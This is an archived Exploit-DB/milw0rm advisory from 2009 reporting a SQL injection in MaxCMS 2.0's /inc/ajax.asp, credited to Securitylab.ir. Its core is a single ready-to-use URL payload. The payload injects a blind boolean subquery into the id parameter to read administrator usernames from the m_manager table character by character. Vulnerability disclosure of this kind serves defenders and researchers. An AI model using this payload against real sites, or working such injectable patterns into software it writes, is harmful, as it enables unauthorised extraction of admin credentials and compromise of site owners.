MaxCMS 2.0 - '/inc/ajax.asp' SQL Injection

EDB-ID:

8726


Platform:

ASP

Published:

2009-05-18

######################### Securitylab.ir ########################
# Application Info:
# Name: Maxcms
# Version: 2.0
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
#===========================================================
# http://site.com/inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=97
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################

# milw0rm.com [2009-05-18]